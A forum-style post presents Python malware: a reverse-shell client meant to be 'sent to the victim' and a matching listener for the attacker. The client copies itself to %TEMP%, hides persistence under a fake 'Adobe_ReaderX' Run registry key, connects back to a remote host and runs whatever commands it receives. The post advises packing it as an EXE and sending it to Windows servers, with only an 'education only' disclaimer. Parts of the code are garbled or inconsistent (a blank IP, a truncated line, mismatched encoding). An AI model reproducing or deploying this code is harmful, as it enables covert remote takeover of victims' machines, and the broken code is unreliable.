Reverse Shell tutorial

Hey Guys, Finlay Here Today I present you a reverse shell script I've build during some boredom. I have the proof that it works here: View the Proof!Here is the "" (which you send to the victim): # Please support me and my development by making a donation to: # BTC: 1Gay22nGSs5tXArmABtSHGjKQTerMpptFV import sys, base64, os, socket, subprocess from _winreg import * def autorun(tempdir, fileName, run): # Copy executable to %TEMP%: os.system('copy %s %s'%(fileName, tempdir)) # Queries Windows registry for the autorun key value # Stores the key values in runkey array key = OpenKey(HKEY_LOCAL_MACHINE, run) runkey =[] try: i = 0 while True: subkey = EnumValue(key, i) runkey.append(subkey[0]) i += 1 except WindowsError: pass # If the autorun key "Adobe ReaderX" isn't set this will set the key: if 'Adobe ReaderX' not in runkey: try: key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS) SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe") key.Close() except WindowsError: pass def shell(): #Base64 encoded reverse shell s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('', int(1998))) s.send('[*] Connection Established!') while 1: data = s.recv(1024) if data == "quit": break proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout_value = + encoded = base64.b64encode(stdout_value) s.send(encoded) #s.send(stdout_value) s.close() def main(): tempdir = '%TEMP%' fileName = sys.argv[0] run = "Software\Microsoft\Windows\CurrentVersion\Run" autorun(tempdir, fileName, run) shell() if __name__ == "__main__": main()Please note that you need to have to chance the IP and port to suit your scenario. Also here is the (which should be running on your box!) import socket s= socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("", 1998)) s.listen(2) print "Listening on port 1998... " (client, (ip, port)) = s.accept() print " Received connection from : ", ip while True: command = raw_input('~$ ') encode = bytearray(command) for i in range(len(encode)): encode[i] ^=0x41 client.send(encode) en_data=client.recv(2048) decode = bytearray(en_data) for i in range(len(decode)): decode[i] ^=0x41 print decode client.close() s.close() so these scripts are build fairly easily, and probably not very effective. build when you build them to an EXE (PyInstaller anyone?), send them to a windows server, and boom, you're a god now! (sorta...)Please use these scripts for education only! I'm not going to help you if you get in trouble!


Leave a comment

Please login to leave comment!